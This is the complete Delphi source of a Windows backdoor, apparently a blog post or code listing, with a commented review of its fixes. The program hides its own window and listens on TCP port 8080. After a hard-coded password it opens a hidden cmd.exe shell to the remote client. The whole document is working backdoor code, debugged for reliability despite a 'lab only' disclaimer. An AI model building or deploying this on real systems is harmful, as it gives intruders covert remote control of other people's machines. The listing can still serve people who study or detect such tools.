winsock 实现telnet后门 — Delphi listing of a password-gated TCP bind shell: it listens on port 8080, checks a hard-coded cleartext password, then pipes cmd.exe to the client over Winsock. Lab / authorized-testing material only.

2018-10-30

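program Project1;
{$APPTYPE CONSOLE}
{
  Password-gated TCP "telnet" bind shell for Windows, written against the
  Delphi winsock unit.

  Flow of the main block:
    1. hide the console window,
    2. listen on TCP port 8080 on every interface and accept ONE client,
    3. prompt for a password and compare it with the hard-coded constant,
    4. on success spawn a hidden cmd.exe whose stdin/stdout/stderr are
       redirected through two anonymous pipes,
    5. relay bytes between the socket and the pipes until the client sends
       "exit", the client disconnects / times out, or cmd.exe exits.

  Security notes (properties of the design, not changed here):
    * the password, every command and every response travel in cleartext;
    * the password is a constant embedded in the binary;
    * there is no lockout or rate limit and the listener binds INADDR_ANY;
    * cmd.exe inherits the full token of the user who started this process.
  Use only in a lab or under explicit authorization.

  Fixes relative to the original listing:
    * SO_RCVTIMEO was set on the LISTENING socket and the integer 50000 was
      cast to a pointer and passed as the option buffer; the option now goes
      on the accepted client socket and receives the address of the value;
    * a wrong password closed the socket but still fell through and spawned
      cmd.exe; it now terminates the program;
    * the password comparison ignores the CR/LF a telnet client appends;
    * recv() results are checked so a disconnect/timeout no longer feeds a
      negative length to WriteFile;
    * the "exit" check compared a single Char against the literal 'exit';
    * the parent closes its copies of the child-side pipe ends so the relay
      loop notices when cmd.exe exits; STARTUPINFO.cb is set; every socket,
      pipe and process handle is released on every exit path, and
      closesocket() runs before WSACleanup().
}
uses
SysUtils,
windows,
winsock;

const
  ListenPort = 8080;                          // TCP port to listen on
  AccessPassword = 'ade';                     // cleartext password expected from the client
  RecvTimeoutMs: DWORD = 50000;               // SO_RCVTIMEO for the accepted client socket (ms)
  CmdPath = 'c:\windows\system32\cmd.exe';    // command interpreter spawned after login
  IoChunk = 1024;                             // bytes moved per socket/pipe transfer

var
  wsadata: TWSADATA;
  buff: array[0..4096] of char;               // pipe -> socket buffer (also holds the password input)
  cmd: array[0..1024] of char;                // socket -> pipe buffer
  hy, getpass, error, ok, quit: array[0..50] of char;   // messages sent to the client
  bindserver, getclient: TSocket;
  addrserver, addrclient: sockaddr_in;
  namelen: integer;
  // pipe1: cmd.exe stdout/stderr -> this process; pipe2: this process -> cmd.exe stdin
  hreadpipe1, hwritepipe1, hreadpipe2, hwritepipe2: THandle;
  sa: SECURITY_ATTRIBUTES;
  siinfo: STARTUPINFO;
  processinformation: PROCESS_INFORMATION;
  avail, bytesRead, bytesWritten: DWORD;
  n: integer;
  received: string;
  cmdline: array[0..MAX_PATH] of char;

{ Release every socket, pipe and process handle this process owns.
  Globals are zero-initialised, so a 0 handle means "never created".
  Closing hwritepipe2 (cmd.exe's stdin) makes the child see EOF and exit
  on its own; it is not killed forcibly. }
procedure Cleanup;
begin
  if getclient <> 0 then closesocket(getclient);
  if bindserver <> 0 then closesocket(bindserver);
  WSACleanup;   // after the sockets are closed, not before
  if hwritepipe2 <> 0 then CloseHandle(hwritepipe2);
  if hreadpipe1 <> 0 then CloseHandle(hreadpipe1);
  if hreadpipe2 <> 0 then CloseHandle(hreadpipe2);
  if hwritepipe1 <> 0 then CloseHandle(hwritepipe1);
  if processinformation.hProcess <> 0 then CloseHandle(processinformation.hProcess);
  if processinformation.hThread <> 0 then CloseHandle(processinformation.hThread);
end;

begin
  // Hide whatever window is in the foreground at start-up; on a plain launch
  // that is this program's own console.  NOTE(review): GetForegroundWindow
  // can return another application's window if focus has moved -- confirm.
  showwindow(getforegroundwindow, SW_HIDE);

  // Client-facing strings, byte-for-byte as in the original listing.
  hy:='Welcome to hear.........'#10#13;
  quit:=#10#13'Telnet 8080 Close.........'#10#13;
  getpass:='Input You PassWord:';
  error:=#13'You Input PassWord is ERROR!';
  ok:=#10#13'You Input PassWord is OK!';

  if WSAStartup(MAKEWORD(2,2), wsadata) <> 0 then Exit;

  bindserver := socket(AF_INET, SOCK_STREAM, 0);
  if bindserver = INVALID_SOCKET then
  begin
    bindserver := 0;
    Cleanup;
    Exit;
  end;
  FillChar(addrserver, sizeof(addrserver), 0);
  addrserver.sin_family := AF_INET;
  addrserver.sin_port := htons(ListenPort);
  addrserver.sin_addr.S_addr := INADDR_ANY;    // reachable on every interface
  if (bind(bindserver, addrserver, sizeof(addrserver)) = SOCKET_ERROR) or
     (listen(bindserver, 5) = SOCKET_ERROR) then
  begin
    Cleanup;
    Exit;
  end;

  // Exactly one client is served; the program ends when that session ends.
  namelen := sizeof(addrclient);
  getclient := accept(bindserver, @addrclient, @namelen);
  if getclient = INVALID_SOCKET then
  begin
    getclient := 0;
    Cleanup;
    Exit;
  end;

  // The receive timeout belongs on the CLIENT socket, and setsockopt wants
  // the address of the value, not the value cast to a pointer.
  setsockopt(getclient, SOL_SOCKET, SO_RCVTIMEO, PChar(@RecvTimeoutMs), sizeof(RecvTimeoutMs));

  send(getclient, hy, strlen(hy), 0);
  send(getclient, getpass, strlen(getpass), 0);
  n := recv(getclient, buff, IoChunk, 0);
  if n <= 0 then
  begin
    Cleanup;
    Exit;
  end;
  // Compare only the bytes actually received, minus the CR/LF a telnet
  // client sends after the password.
  SetString(received, buff, n);
  if Trim(received) <> AccessPassword then
  begin
    send(getclient, error, strlen(error), 0);
    Cleanup;   // the original fell through here and still spawned cmd.exe
    Exit;
  end;
  send(getclient, ok, strlen(ok), 0);

  // Two inheritable anonymous pipes: pipe1 carries cmd.exe output to us,
  // pipe2 carries our input to cmd.exe.
  sa.nLength := sizeof(SECURITY_ATTRIBUTES);
  sa.lpSecurityDescriptor := nil;
  sa.bInheritHandle := TRUE;
  if (not CreatePipe(hreadpipe1, hwritepipe1, @sa, 0)) or
     (not CreatePipe(hreadpipe2, hwritepipe2, @sa, 0)) then
  begin
    Cleanup;
    Exit;
  end;

  FillChar(siinfo, sizeof(STARTUPINFO), 0);
  siinfo.cb := sizeof(STARTUPINFO);            // required by CreateProcess
  siinfo.dwFlags := STARTF_USESTDHANDLES or STARTF_USESHOWWINDOW;
  siinfo.wShowWindow := SW_HIDE;
  siinfo.hStdInput := hreadpipe2;
  siinfo.hStdOutput := hwritepipe1;
  siinfo.hStdError := hwritepipe1;
  // lpCommandLine may be modified by CreateProcess, so pass a writable buffer.
  StrPCopy(cmdline, CmdPath);
  if not CreateProcess(nil, cmdline, nil, nil, True, 0, nil, nil, siinfo, processinformation) then
  begin
    Cleanup;
    Exit;
  end;
  // Drop our copies of the child's pipe ends.  While we hold a writer on
  // pipe1, PeekNamedPipe can never report a broken pipe after cmd.exe exits
  // and the relay loop would never terminate on its own.
  CloseHandle(hreadpipe2);  hreadpipe2 := 0;
  CloseHandle(hwritepipe1); hwritepipe1 := 0;

  // Relay loop: forward pending cmd.exe output first; only when there is
  // none, block on the socket (bounded by SO_RCVTIMEO) for the next command.
  while True do
  begin
    // Fails with ERROR_BROKEN_PIPE once cmd.exe has exited.
    if not PeekNamedPipe(hreadpipe1, nil, 0, nil, @avail, nil) then break;
    if avail <> 0 then
    begin
      if not ReadFile(hreadpipe1, buff, IoChunk, bytesRead, nil) then break;
      if send(getclient, buff, bytesRead, 0) = SOCKET_ERROR then break;
    end
    else
    begin
      // n <= 0: the client closed the connection or the receive timed out.
      n := recv(getclient, cmd, IoChunk, 0);
      if n <= 0 then break;
      if not WriteFile(hwritepipe2, cmd, n, bytesWritten, nil) then break;
      // A line starting with "exit" ends the session from our side as well.
      if (n >= 4) and (StrLComp(cmd, 'exit', 4) = 0) then
      begin
        send(getclient, quit, strlen(quit), 0);
        break;
      end;
    end;
  end;

  Cleanup;
end.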
